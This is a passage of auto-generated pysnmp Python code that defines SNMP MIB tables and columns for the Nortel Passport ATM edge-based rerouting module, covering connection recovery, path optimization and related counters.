mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
